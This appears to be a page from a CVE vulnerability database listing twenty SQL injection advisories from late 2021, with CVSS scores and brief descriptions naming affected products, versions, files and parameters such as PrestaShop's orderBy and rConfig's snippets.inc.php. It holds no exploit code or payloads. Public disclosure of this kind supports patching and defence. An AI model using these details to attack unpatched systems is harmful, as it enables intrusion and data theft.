Total
11593 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2021-42131 | 1 Ivanti | 1 Avalanche | 2021-12-08 | 6.5 MEDIUM | 8.8 HIGH |
| A SQL Injection vulnerability exists in Ivanti Avalance before 6.3.3 allows an attacker with access to the Inforail Service to perform privilege escalation. | |||||
| CVE-2021-43789 | 1 Prestashop | 1 Prestashop | 2021-12-08 | 7.5 HIGH | 9.8 CRITICAL |
| PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2. | |||||
| CVE-2021-24943 | 1 Roundupwp | 1 Registrations For The Events Calendar | 2021-12-07 | 7.5 HIGH | 9.8 CRITICAL |
| The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection. | |||||
| CVE-2021-31632 | 1 B2evolution | 1 B2evolution Cms | 2021-12-07 | 7.5 HIGH | 9.8 CRITICAL |
| b2evolution CMS v7.2.3 was discovered to contain a SQL injection vulnerability via the parameter cfqueryparam in the User login section. This vulnerability allows attackers to execute arbitrary code via a crafted input. | |||||
| CVE-2021-24866 | 1 Wpdataaccess | 1 Wp Data Access | 2021-12-07 | 7.5 HIGH | 9.8 CRITICAL |
| The WP Data Access WordPress plugin before 5.0.0 does not properly sanitise and escape the backup_date parameter before using it a SQL statement, leading to a SQL injection issue and could allow arbitrary table deletion | |||||
| CVE-2021-40313 | 1 Piwigo | 1 Piwigo | 2021-12-07 | 6.5 MEDIUM | 8.8 HIGH |
| Piwigo v11.5 was discovered to contain a SQL injection vulnerability via the parameter pwg_token in /admin/batch_manager_global.php. | |||||
| CVE-2021-44348 | 1 Yejiao | 1 Tuzicms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameer in App\Manage\Controller\AdvertController.class.php. | |||||
| CVE-2021-35414 | 1 Chamilo | 1 Chamilo Lms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| Chamilo LMS v1.11.x was discovered to contain a SQL injection via the doc parameter in main/plagiarism/compilatio/upload.php. | |||||
| CVE-2021-44349 | 1 Yejiao | 1 Tuzicms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameter in App\Manage\Controller\DownloadController.class.php. | |||||
| CVE-2020-10549 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2020-10548 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2021-44050 | 2 Broadcom, Microsoft | 4 Ca Network Flow Analysis, Windows Server 2012, Windows Server 2016 and 1 more | 2021-12-06 | 4.0 MEDIUM | 6.5 MEDIUM |
| CA Network Flow Analysis (NFA) 21.2.1 and earlier contain a SQL injection vulnerability in the NFA web application, due to insufficient input validation, that could potentially allow an authenticated user to access sensitive data. | |||||
| CVE-2020-10547 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2021-44347 | 1 Yejiao | 1 Tuzicms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| SQL Injection vulnerability exists in TuziCMS v2.0.6 in App\Manage\Controller\GuestbookController.class.php. | |||||
| CVE-2021-41746 | 1 Yonyou | 1 Turbocrm | 2021-12-06 | 5.0 MEDIUM | 7.5 HIGH |
| SQL Injection vulnerability exists in all versions of Yonyou TurboCRM.via the orgcode parameter in changepswd.php. Attackers can use the vulnerabilities to obtain sensitive database information. | |||||
| CVE-2020-10546 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2021-25784 | 1 Taogogo | 1 Taocms | 2021-12-04 | 6.5 MEDIUM | 7.2 HIGH |
| Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Edit Article. | |||||
| CVE-2021-25783 | 1 Taogogo | 1 Taocms | 2021-12-04 | 6.5 MEDIUM | 7.2 HIGH |
| Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Article Search. | |||||
| CVE-2019-7164 | 5 Debian, Opensuse, Oracle and 2 more | 9 Debian Linux, Backports Sle, Leap and 6 more | 2021-12-03 | 7.5 HIGH | 9.8 CRITICAL |
| SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection via the order_by parameter. | |||||
| CVE-2021-43679 | 1 Shopex | 1 Ecshop | 2021-12-03 | 7.5 HIGH | 9.8 CRITICAL |
| ecshop v2.7.3 is affected by a SQL injection vulnerability in shopex\ecshop\upload\api\client\api.php. | |||||